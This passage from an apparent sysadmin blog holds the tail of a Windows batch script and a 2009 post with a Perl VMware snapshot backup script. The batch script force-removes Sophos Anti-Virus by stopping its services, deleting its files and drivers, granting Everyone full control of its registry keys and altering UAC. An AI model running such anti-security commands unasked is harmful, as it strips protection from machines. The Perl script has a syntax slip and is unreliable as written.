echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{66241874-FF4F-47FA-9A47-59BE901FFCC2}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{CFC5C7CA-DA4C-4CFB-B16A-65193004E9C2}] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1474930F-6D2F-42E1-A604-958E2A287D32}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1E4DEB88-3386-4E80-A7D1-9997C39A570D}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{4629634A-1AF8-4E02-B5A2-0273FE770C74}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BDC72FC6-3EEE-49D8-8D37-5D3655A704FC}] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{CE94B62D-25F3-4430-AA85-A22C2888EE65}] >> %TEMP%\SOTMP.REG

REM ==============================================================================================================

ECHO.
ECHO Stopping Sophos Services...
net stop "Sophos Agent" >NUL 2> NUL
net stop "Sophos Anti-Virus" >NUL 2> NUL
net stop "Sophos Anti-Virus status reporter" >NUL 2> NUL
net stop "Sophos AutoUpdate Service" >NUL 2> NUL
net stop "Sophos Message Router" > NUL 2> NUL
net stop sweepupdate > NUL 2> NUL
net stop sweepnet > NUL 2> NUL
net stop "Sophos Cache Manager" > NUL 2> NUL
ECHO Completed.

ECHO.
ECHO Unregistering Sophos DLLs...

REM === Sophos Anti-Virus DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\BackgroundScanClient.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVCleanupService.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavMain.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavProgress.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\AuthorisedLists.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\BackgroundScanning.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Categories.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ComponentManager.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Configuration.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\DesktopMessaging.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\detoured.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\DriveProcessor.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\EEConsumer.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\FilterProcessors.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\FSDecomposer.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICAdapter.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICManagement.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ICProcessors.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\LegacyConsumers.dll""
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Localisation.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Logging.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\msvcp71.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\msvcr71.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\osdp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Persistance.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavAdapter.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVI.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVI0.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SAVMSCM.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavNeutralRes.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavRes.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResChs.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResCht.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResDeu.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResEng.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResEsp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResFra.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResIt.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavResJap.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavShellExt.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanEditExports.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanEditFacade.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ScanManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Security.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SIPSManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SophtainerAdapter.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SystemInformation.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ThreatDetection.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\ThreatManagement.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\Translators.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\veex.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\Sophos Anti-Virus\VirusDetection.dll"

REM === SAV 4.x DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ACCESSDT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\DESKRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ELOGRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICHKRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICMONRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICNTSYS.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\ICSTAT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\MEADAPTER.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\NMSGRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\OSDP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVI.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVIREG.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SAVMSCM.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SHRDRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SMTPRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPPP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SNMPWRAP.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWEEPNT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWOUTPUT.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\SWOUTRES.DLL"
regsvr32 /u /s "%PROGRAMFILES%\Sophos Sweep for NT\VEEX.DLL"

REM === Sophos AutoUpdate DLLs ===
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\AUAdapter.dll"
::regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\boost_date_time-vc71-mt-1_32.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ChannelUpdater.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\cidsync.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\config.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\crypto.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\EECustomActions.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\inetconn.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\InstlMgr.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ispsheet.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\libcurl.dll"
::regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\libeay32.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\Logger.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\retailer.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\SAUConfigDLL.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\swlocale.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmlcpp.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmlparse.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\xmltok.dll"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALMon.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALsvc.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\ALUpdate.exe"
regsvr32 /u /s "%PROGRAMFILES%\Sophos\AutoUpdate\AUAdapter.exe"
ECHO Completed.


ECHO.
ECHO Deleting Sophos Services...
"%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavService.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Sophos Anti-Virus\SavAdminService.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\ManagementAgentNT.exe" -uninstall >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\AutoUpdateAgentNT.exe" -uninstall >NUL 2>NUL
"%PROGRAMFILES%\Sophos\AutoUpdate\ALSvc.exe" /UnregServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\AutoUpdate\ALMon.exe" /UnRegServer >NUL 2>NUL
"%PROGRAMFILES%\Sophos\Remote Management System\RouterNT.exe" -uninstall >NUL 2>NUL
sc delete sweepupdate >NUL 2>NUL
sc delete sweepnet >NUL 2>NUL
ECHO Completed.

Echo.
ECHO Removing Sophos Installed Files...
RD /S /Q "%PROGRAMFILES%\SOPHOS\AutoUpdate" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\Sophos Anti-Virus" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\Remote Management System" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS\" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Sophos" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos" >NUL 2>NUL
RD /s /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos" >NUL 2>NUL
RD /s /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos Anto-Virus" >NUL 2>NUL
RD /S /Q "%ALLUSERSPROFILE%\Application Data\Sophos" >NUL 2>NUL
RD /S /Q "%USERPROFILE%\Application Data\Sophos" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\AutoUpdate Monitor.lnk" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{09C6BF52-6DBA-4A97-9939-B6C24E4738BF}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{15C418EB-7675-42be-B2B3-281952DA014D}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{C12953C2-4F15-4A6C-91BC-511B96AE2775}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{FF11005D-CBC8-45D5-A288-25C7BB304121}" >NUL 2>NUL
RD /S /Q "%WINDIR%\Installer\{034759DA-E21A-4795-BFB3-C66D17FAD183}" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\Drivers\savonaccesscontrol.sys" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\Drivers\savonaccessfilter.sys" >NUL 2>NUL
DEL /F /Q "%WINDIR%\System32\drivers\savonaccess.sys" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\SOPHOS Sweep for NT" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\InterCheck Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Startup\Remote Update Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%ALLUSERSPROFILE%\Start Menu\Programs\Sophos\Remote Update Monitor.lnk" >NUL 2>NUL
DEL /F /Q "%USERSPROFILE%\Start Menu\Programs\Startup\Remote Update Monitor.lnk" >NUL 2>NUL
RD /S /Q "%PROGRAMFILES%\Sophos\Remote Update" >NUL 2>NUL
ECHO Completed.

REM === Remove the typical Sophos account/groups for Sophos AutoUpdate ===
ECHO.
ECHO Removing Sophos Accounts and Groups...
Net user SophosSAU%COMPUTERNAME%0 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%1 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%2 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%3 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%4 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%5 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%6 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%7 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%8 /DELETE >NUL 2>NUL
Net user SophosSAU%COMPUTERNAME%9 /DELETE >NUL 2>NUL

Net localgroup SophosAdministrator /DELETE >NUL 2> NUL
Net localgroup SophosOnAccess /DELETE >NUL 2> NUL
Net localgroup SophosPowerUser /DELETE >NUL 2> NUL
Net localgroup SophosUser /DELETE >NUL 2> NUL
ECHO Completed.


ECHO Changing Permissions on Sophos...
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0000 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0001 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0002 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0003 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0004 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0005 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0006 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0007 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0008 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-0009 /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000a /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000b /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000c /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000d /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-000e /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-Adapter /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SAV-Info /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\SavAdminService /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus Daily" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg "HKEY_LOCAL_MACHINE\Software\Sophos\SAVI\Sophos Anti-Virus InterCheck" /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Inetconn.Connection /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Products /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\AutoUpdate\Service /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System\CertificationIdentityKeys /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Messaging System\Router /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System\CertificationIdentityKeys /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Management System\ManagementAgent /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Application /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Components /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\PP /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\SAVUI /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\Status /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SAVService\UpdateStatus /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SweepNT /setowner=Administrators /GRANT=Everyone=F >NUL 2>NUL
"%PROGRAMFILES%\Windows Resource Kits\Tools\subinacl.exe" /nostatistic /keyreg HKEY_LOCAL_MACHINE\SOFTWARE\Classes /GRANT=Administrators=F >NUL 2>NUL

ECHO Completed.

Echo.
ECHO Deleting SAVI...
REG DELETE HKLM\Software\Sophos\SAVI /F > NUL 2> NUL
ECHO REGEDIT4 > %TEMP%\SOSAVI.REG
ECHO. >> %TEMP%\SOSAVI.REG
ECHO [-HKEY_LOCAL_MACHINE\Software\Sophos\SAVI] >> %TEMP%\SOSAVI.REG
REGEDIT /S %TEMP%\SOSAVI.REG >NUL 2>NUL
ECHO Completed.

Echo.
ECHO Removing Sophos Registry Keys...
SC create SopReg binpath= "cmd /K START /WAIT REGEDIT /S %TEMP%\SOTMP.REG" type= own type= interact > NUL
sc start "SopReg" > NUL
sc delete "SopReg" > NUL
REGEDIT /S %TEMP%\SOTMP.REG >NUL 2>NUL
ECHO Completed.

ECHO.
ECHO Checking for Microsoft Vista (2)...
ver|find "Version 6.0" >NUL
if %errorlevel% equ 0 (
Echo.
Echo Found: Changing UAC back to alert mode...
ECHO REGEDIT4 > %temp%\sopuac.reg
ECHO. >> %temp%\sopuac.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] >> %temp%\sopuac.reg
ECHO "ConsentPromptBehaviorAdmin"=dword:00000002 >> %temp%\sopuac.reg
regedit /S %temp%\sopuac.reg >NUL 2>NUL
ECHO Completed.
) ELSE (Echo Microsoft Vista not found.)

REM === Deletes Temp files ===
DEL /F /Q %TEMP%\SOTMP.REG >NUL 2>NUL
DEL /F /Q %TEMP%\SOPUAC.REG >NUL 2>NUL
DEL /F /Q %TEMP%\SOSAVI.REG >NUL 2>NUL

ECHO.
ECHO ====================================================
ECHO Script Completed.
ECHO.
ECHO please reboot the computer and run this script again
ECHO to remove files that may currently be in use.
ECHO ====================================================
Echo.
Pause
EXIT

Sunday, June 28, 2009

VMware Backup Script

#############################################################################
#Backup VM Images
#06-05-2009
#
#Important:
# When restoring VM, ensure you restart the VM Machine
#
# *****Script IS CASE SENSITIVE*******
#############################################################################

my $url = "https://ipaddress:443/sdk/vimService "; #URL to your ESX Host
my $username = "root"; #Username
my $password = "PASSWORD"; #User password
my $snapshotname = "BackupSnap"; #Name of your Snapshot
my $DSPath = "[Store]"; #Datastore name on ESX Host, example [Store]
my @VMNames;
$VMNames[0] = "SERVERNAME"; #List your VM's - CASE SENSITIVE ***
$VMNames[1] = "SERVERNAME2";
$VMNames[2] = "SERVERNAME3";
#$VMNames[3] = "";
#$VMNames[4] = "";
#$VMNames[5] = "";
#$VMNames[6] = "";
#$VMNames[7] = "";
#$VMNames[8] = "";
#$VMNames[9] = "";
my $RCLIPath = "C:/Progra~1/VMware/VMWARE~1"; #VI Remote CLI Path (Windows: Use ONLY Short Folder Names!!!!)
my $DestPath = "X:/"; #Destination Path you like to copy to (Windows: Use ONLY Short Folder Names!!!!)

#IMPORTANT!!! -- Under DestPath must exist the VMNames Folder
#(For Example if your VMNames[0] = "ServerA" and your DestPath = "D:/": D:/ServerA/)
#--------------------------------------------------------

#call the sub function (at the bottom)
&actualtime();
print " ***** Script Start *************************\n\n";

&actualtime();
print " ----- Create Snapshots of running VM's -----";
print "\n\n";
system("perl $RCLIPath/Perl/apps/vm/snapshotmanager.pl --url $url --username $username --password $password --operation create --powerstatus poweredOn --snapshotname $snapshotname");
print "\n\n";

&actualtime();
print " ----- Copy VM files to local storage -----";
print "\n\n";
my $i = 0;
#special loop for arrays. run as long the array has data
foreach (@VMNames)
{
#read all available files and save filenames in the cache-array
my @cache = `perl $RCLIPath/bin/vifs.pl --url $url --username $username --password $password --dir \"$DSPath $VMNames[$i]\"`;
#run as long the cache array has data and save the value everytime in $filename
foreach my $filename (@cache)
{
#exclude uninterresting files from backup to save backup space
if($filename !~ /.log/ && $filename !~ /.vswp/ && $filename !~ /.vmsn/ && $filename !~ /-delta/)
{
#remove the "\n" at the end of $filename to prevent a error massage in log
chomp($filename)
&actualtime();
print " ----- Copy File: ";
print $filename;
#get files from VM Datastore to a local Storage
system("perl $RCLIPath/bin/vifs.pl --url $url --username $username --password $password --get \"$DSPath $VMNames[$i]/$filename\" \"$DestPath$VMNames[$i]/$filename\"");
print "\n";
}
}
$i++;
}
print "\n\n";

&actualtime();
